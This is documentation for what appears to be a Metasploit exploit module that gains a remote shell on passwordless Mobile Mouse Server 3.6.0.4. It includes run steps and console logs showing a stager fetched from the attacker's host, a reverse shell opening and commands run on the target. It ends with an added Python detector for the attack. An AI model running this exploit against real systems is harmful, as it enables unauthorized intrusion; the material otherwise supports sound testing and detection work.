## Vulnerable Application

This module uses the protocol of Mobile Mouse Server, by RPA Technologies, Inc, to deploy a payload and run it from the server. The module will only deploy a payload if the server is set without a password (the default).

Tested against 3.6.0.4, current at the time of module writing.

Version 3.6.0.4 can be downloaded from https://www.mobilemouse.com/downloads/setup.exe

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/mobile_mouse_rce`
4. Set `rhost` and `lhost` as required.
5. Do: `run`
6. You should get a shell as the user who is running Mobile Mouse.

## Options

### SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to `3`, but can be a little touchy.

## Scenarios

### Mobile Mouse 3.6.0.4 on Windows 10

```
resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mobile_mouse.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (mobile_mouse.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (mobile_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/mobile_mouse_rce) > run

[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:9099 - Client name set to: M6braOok6j
[*] 1.1.1.1:9099 - Connecting
[+] 1.1.1.1:9099 - Connected to hostname WIN10PROLICENSE with MAC address 00:0C:29:B3:68:3D
[*] 1.1.1.1:9099 - Opening Command Prompt
[*] 1.1.1.1:9099 - Sending stager
[*] 1.1.1.1:9099 - Using URL: http://2.2.2.2:8080/
[+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging
[*] 1.1.1.1:9099 - Opening Command Prompt again
[+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging
[*] 1.1.1.1:9099 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 1.1.1.1
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49696) at 2022-09-26 15:40:03 -0400
[*] 1.1.1.1:9099 - Server stopped.
[!] 1.1.1.1:9099 - This exploit may require manual cleanup of 'c:\Windows\Temp\gxYUnChTLrOuA.exe' on the target

Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----

C:\Windows\Temp>whoami
whoami
win10prolicense\windows

C:\Windows\Temp>systeminfo
systeminfo

Host Name: WIN10PROLICENSE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.16299 N/A Build 16299
```

### Mobile Mouse 3.6.0.4 on Windows 10, with a password

This should fail, as the exploit was not written to work with a password.

```
resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mobile_mouse.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (mobile_mouse.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (mobile_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/mobile_mouse_rce) > run

[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:9099 - Client name set to: baqpHBHh5Q
[*] 1.1.1.1:9099 - Connecting
[-] 1.1.1.1:9099 - Exploit aborted due to failure: no-access: Unable to connect, server response: Please enter a password
[*] Exploit completed, but no session was created.
```
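
A defender-side view of the first scenario, as an added example that is not part of the module or its documentation: the transcript shows a client connecting to TCP 9099, the target fetching the stager over HTTP from that same client, and an executable landing in `C:\Windows\Temp`. The Python below correlates those three signals; the event schema, field names, time window and sample events are constructed assumptions, not a real log format.

```python
import re
from datetime import datetime, timedelta

MM_PORT = 9099                   # Mobile Mouse Server port seen in the module output
WINDOW = timedelta(seconds=120)  # assumed correlation window; widen for large SLEEP values
TEMP_EXE = re.compile(r"^c:\\windows\\temp\\[^\\]+\.exe$", re.IGNORECASE)

# Constructed sample events in a hypothetical normalized schema (e.g. mapped
# from network-connection and file-creation telemetry on the Windows host).
SAMPLE_EVENTS = [
    {"ts": "2022-09-26T15:39:40", "type": "net_in", "src": "2.2.2.2", "dport": 9099},
    {"ts": "2022-09-26T15:39:52", "type": "net_out", "dst": "2.2.2.2", "dport": 8080},
    {"ts": "2022-09-26T15:39:53", "type": "file_create",
     "path": r"C:\Windows\Temp\gxYUnChTLrOuA.exe"},
    {"ts": "2022-09-26T15:45:00", "type": "net_in", "src": "10.0.0.7", "dport": 9099},
    {"ts": "2022-09-26T16:30:00", "type": "file_create",
     "path": r"C:\Windows\Temp\setup_helper.exe"},
]

def find_suspicious_sessions(events, window=WINDOW):
    """Alert on an inbound 9099 connection that is followed, within `window`,
    by an outbound connection back to the same peer and by an .exe created
    directly in the Windows Temp directory."""
    parsed = sorted(({**e, "ts": datetime.fromisoformat(e["ts"])} for e in events),
                    key=lambda e: e["ts"])
    alerts = []
    for start in parsed:
        if start["type"] != "net_in" or start["dport"] != MM_PORT:
            continue
        later = [e for e in parsed if start["ts"] <= e["ts"] <= start["ts"] + window]
        # The stager is fetched from the host that drove the 9099 session.
        callbacks = [e for e in later
                     if e["type"] == "net_out" and e["dst"] == start["src"]]
        drops = [e for e in later
                 if e["type"] == "file_create" and TEMP_EXE.match(e["path"])]
        if callbacks and drops:
            alerts.append({
                "peer": start["src"],
                "time": start["ts"].isoformat(),
                "fetch_ports": sorted({e["dport"] for e in callbacks}),
                "files": [e["path"] for e in drops],
            })
    return alerts

if __name__ == "__main__":
    for alert in find_suspicious_sessions(SAMPLE_EVENTS):
        print(alert)
```

An inbound 9099 connection alone (the `10.0.0.7` event) is ordinary use of the product and does not alert; only the combination with a callback to the same peer and a dropped executable does.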